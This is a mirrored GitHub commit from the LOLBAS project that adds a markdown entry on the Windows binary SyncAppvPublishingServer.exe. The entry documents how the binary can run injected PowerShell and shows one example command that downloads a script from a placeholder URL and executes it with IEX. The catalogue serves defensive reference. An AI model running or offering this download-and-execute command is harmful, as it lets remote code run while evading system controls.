mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-28 21:22:07 +02:00
Removed MD files, we only use the webportal from now on. All MD files moved to archive
This commit is contained in:
@@ -0,0 +1,16 @@
|
||||
## SyncAppvPublishingServer.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||
Example command on how inject Powershell code into the process
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/monoxgas/status/895045566090010624
|
||||
|
||||
* Full path:
|
||||
* C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
|
||||
* Notes: Thanks to Nick Landers - @monoxgas
|
||||
|
Reference in New Issue
Block a user